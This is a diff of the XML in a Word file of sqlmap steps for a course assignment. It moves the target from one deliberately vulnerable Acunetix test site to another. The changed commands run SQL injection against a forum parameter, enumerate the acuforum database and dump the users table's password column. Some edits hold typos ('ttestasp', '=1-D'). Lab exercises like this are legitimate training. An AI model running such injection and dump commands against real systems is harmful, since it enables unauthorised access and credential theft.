--- a/assignment_1/Steps_sqlmap.docx
+++ b/assignment_1/Steps_sqlmap.docx
@@ -171,18 +171,18 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>artists.php?artist</w:t>
+        <w:t xml:space="preserve"> -u testasp.vulnweb.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>showforum.asp?id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -269,18 +269,18 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>artists.php?artist</w:t>
+        <w:t xml:space="preserve"> -u ttestasp.vulnweb.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>showforum.asp?id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -302,7 +302,7 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>acuart</w:t>
+        <w:t>acuforum</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -377,40 +377,40 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>artists.php?artist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">=1 -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>acuart</w:t>
+        <w:t xml:space="preserve"> -u testasp.vulnweb.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>showforum.asp?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1-D </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>acuforum</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -485,18 +485,18 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>artists.php?artist</w:t>
+        <w:t xml:space="preserve"> -u testasp.vulnweb.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>showforum.asp?id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -518,7 +518,7 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>acuart</w:t>
+        <w:t>acuforum</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -606,18 +606,18 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>artists.php?artist</w:t>
+        <w:t xml:space="preserve"> -u testasp.vulnweb.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>showforum.asp?id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -639,24 +639,41 @@
           <w:szCs w:val="23"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="373A3C"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -T users -C pass --dump</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
+        <w:t>acuforum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -T users -C </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>upass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="373A3C"/>
+          <w:sz w:val="23"/>
+          <w:szCs w:val="23"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --dump --threads 6</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
